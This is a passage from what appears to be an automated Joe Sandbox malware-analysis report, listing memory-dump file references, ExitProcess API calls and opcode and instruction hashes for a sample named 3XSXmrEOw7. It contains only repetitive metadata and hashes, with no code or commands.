                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 55eaf7b5eca8cf8464d024d76604aa5ec655f6376b29bc9e4266c05e0e11f99e
                                                                                                                        • Instruction ID: 74791d0c22545c70055771e6a2a9eb0c146df827dad2ee69b64c3d2af2ffbd2c
                                                                                                                        • Opcode Fuzzy Hash: 55eaf7b5eca8cf8464d024d76604aa5ec655f6376b29bc9e4266c05e0e11f99e
                                                                                                                        • Instruction Fuzzy Hash: 2431C4F2D041249EF3504654ED84BF73629DB80320F14817BE84E66AC1EA7D5ED689A7
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: f20eb3486194cf148af31e9bdd86380c36666145721df0d1448519d9a65ecc7e
                                                                                                                        • Instruction ID: 140f1c7e1b095d92c3b7c4c23f811b4d95b57dd32647f48bef23675d0c3024c2
                                                                                                                        • Opcode Fuzzy Hash: f20eb3486194cf148af31e9bdd86380c36666145721df0d1448519d9a65ecc7e
                                                                                                                        • Instruction Fuzzy Hash: 4631C5B1D042149EF7648B54DD44BFB7675EF94310F2081BBE94DA2384EA3D1EC5CA26
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 993bfc68d75e592377ec58a616de79beaebe56c1ff244e9902020d8ea566cdae
                                                                                                                        • Instruction ID: f04b1176644581f3c7dc485effa38cd8cde1eab7a67360eda047778b644b472c
                                                                                                                        • Opcode Fuzzy Hash: 993bfc68d75e592377ec58a616de79beaebe56c1ff244e9902020d8ea566cdae
                                                                                                                        • Instruction Fuzzy Hash: D921D3E2D042249EF7504620DD84BB7362CEBC0721F14417BE84E66AC4EA7D1FD58966
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 7afcbc2710a91863f03e035ccd55edd61f846bc6efc3210ce1fe36178c94fa0a
                                                                                                                        • Instruction ID: c4680c653a7a46c7e4a6515e3789306913bda43818eaeb427b91c564f5923f34
                                                                                                                        • Opcode Fuzzy Hash: 7afcbc2710a91863f03e035ccd55edd61f846bc6efc3210ce1fe36178c94fa0a
                                                                                                                        • Instruction Fuzzy Hash: B61104B29001148EF7608924EE447BB767AEBD0310F20C2BFD849745C4DB3D0FD68922
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: :2JA
                                                                                                                        • API String ID: 621844428-2456821934
                                                                                                                        • Opcode ID: bed7321c9c204cb8cd5722dbf95b8552fc08eb8f92b1cdc900ef367eba19e80c
                                                                                                                        • Instruction ID: bd6ca9975592287ff3bf37448675c7f8dd8f71a80a3a7f452102db1ec2ca80e7
                                                                                                                        • Opcode Fuzzy Hash: bed7321c9c204cb8cd5722dbf95b8552fc08eb8f92b1cdc900ef367eba19e80c
                                                                                                                        • Instruction Fuzzy Hash: 60118172D082588BE754CA54D8C0BEABBB5EB44314F1081FBD90D67241C7385DC2CE92
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 2a4428f964055bc27906bf0b3943d152fe9f7d2cc4aea13bb19980674960d63b
                                                                                                                        • Instruction ID: 878a7a517feadf35be4a811c99a4a107fe3071d467d10ec570d7f39041e71d9c
                                                                                                                        • Opcode Fuzzy Hash: 2a4428f964055bc27906bf0b3943d152fe9f7d2cc4aea13bb19980674960d63b
                                                                                                                        • Instruction Fuzzy Hash: 62110CB19041189EF7608A65DE44BFB75BAEBD0301F10C17FE449B15C4EB3D0ED68522
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 06ee5b3d2fc16acf124b33efc9de37e96a397455a9b7036738e288a6d516d034
                                                                                                                        • Instruction ID: 91f151be12e34eefcece0535555c551b6786545de7eb143ac315b72f635cada5
                                                                                                                        • Opcode Fuzzy Hash: 06ee5b3d2fc16acf124b33efc9de37e96a397455a9b7036738e288a6d516d034
                                                                                                                        • Instruction Fuzzy Hash: BF11E5B2E041188EF7604A64DE44BFA75BAEBE0301F20817FE44AB15C4EB3D0ED68522
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: b83d9dad2a6c158be96d1e69bc9c1a3b76d9e51e126cb3a63bde19017aee412c
                                                                                                                        • Instruction ID: 9756af19a8da1055843f120654c456da4387201b88b3d00ca56c5845746b4395
                                                                                                                        • Opcode Fuzzy Hash: b83d9dad2a6c158be96d1e69bc9c1a3b76d9e51e126cb3a63bde19017aee412c
                                                                                                                        • Instruction Fuzzy Hash: F61106B19001148EF7608A25DE44BBB767AEBD0310F20C2BBD84DB15C4DB3C0FD68922
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 6d4f8bbf9da01e63885aab117a6982c7bd010285d059c4942f9c7a8494af099a
                                                                                                                        • Instruction ID: 377b1287552c4201c3694d176e94097adba3da47ac4a77b2be544285f1439102
                                                                                                                        • Opcode Fuzzy Hash: 6d4f8bbf9da01e63885aab117a6982c7bd010285d059c4942f9c7a8494af099a
